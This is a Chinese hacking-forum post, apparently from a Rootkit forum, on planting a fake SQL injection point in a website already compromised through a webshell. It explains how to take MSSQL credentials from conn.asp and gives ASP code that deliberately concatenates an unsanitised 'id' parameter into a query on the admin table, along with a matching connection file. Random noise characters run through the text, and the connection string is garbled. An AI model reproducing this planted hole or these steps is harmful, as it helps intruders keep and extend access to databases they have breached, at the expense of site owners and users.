自己构造注入点方便入侵! H& u2 x# H3 D* \. B
* s' @ a/ ~/ e9 m" F8 D今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息. n6 g# E6 {, N5 y
" X& E+ ~% ^! D这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
/ ^- {6 h4 c: @! Z) v& }
5 P: U' V+ B6 p# t& n8 q# X6 }& \首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
$ {" N, I$ h' R% q4 Q% U2 C" u' m; ~1 u( z: `; Q. n* H4 a
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
- R W" o, v# [( E' X* }
; @. ]: J( c% s( z( B因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:9 J% [# x |7 ~) W6 v1 s) F3 R
P. L1 |3 d& n+ ^9 g程序代码5 a! }3 I8 j2 y8 Y- k
<!--#include file="xx.asp"-->" c5 b+ b4 ^7 ?- K. H
<%4 N8 M$ o4 T6 X+ B! _' y( x
set rs=server.createobject("ADODB.recordset")2 u6 j6 x) m: {3 ?7 T" a
id = request("id")/ ?) C* {8 I1 u
strSQL = "select * from admin where id=" & id
: b" J0 g# h- a3 f3 o3 ^rs.open strSQL,conn,1,3
3 p$ J* p4 b3 ]rs.close' @8 [. W8 O4 b) c
%>
6 J9 I" Y: T& [' A a# L8 I% }9 ~4 {6 a4 w5 c
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
) c; u0 T. z% s/ V% H2 k% Q$ X6 o1 w! h& Q }% ?, h
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
0 @: j- P1 Q& P8 L/ V l, H
. Y4 M- q/ F* d4 s v/ p: c2 g# [' ~然后就要构造一个连接数据库的文件了,代码如下:
. i" C. g% Y7 e% W$ O! |程序代码
" y8 u, T, a" J) P<% + K- e" L# J, s' A# T2 Q. f- E
strSQLServerName = "000.000.000.000" '服务器名称或地址' q1 X) d/ q" S2 @) Y6 x9 s8 {
strSQLDBUserName = "sqlname" '数据库帐号5 s, D T1 u# \# L3 y% T
strSQLDBPassword = "sqlpass" '数据库密码. l5 \& H+ ]' i8 r; T
strSQLDBName = "sqldataname" '数据库名称, i* E8 l7 G8 X
Set conn = Server.CreateObject("ADODB.Connection")
! l2 i' O+ F( Q ?strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"6 m$ n/ h6 O9 v6 T1 j3 ^3 \
conn.open strCon7 P8 a% j! J1 x+ h- _1 X9 H$ M
%>
7 ?; d; y4 L4 K" ?! K5 A* ~7 b* ~# Z0 k8 N2 {/ F, k( h
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,7 G- c1 C* u) Q+ \, d* N
, R( V" s3 L; i/ ]1 i0 ]5 U. h8 ~ Z就这样,正常情况下,就OK了,伪造成功……( N& }: G5 l( {
* I( O5 t! f1 k9 c 如果有什么问题可以提出来大家一起探讨解决。 |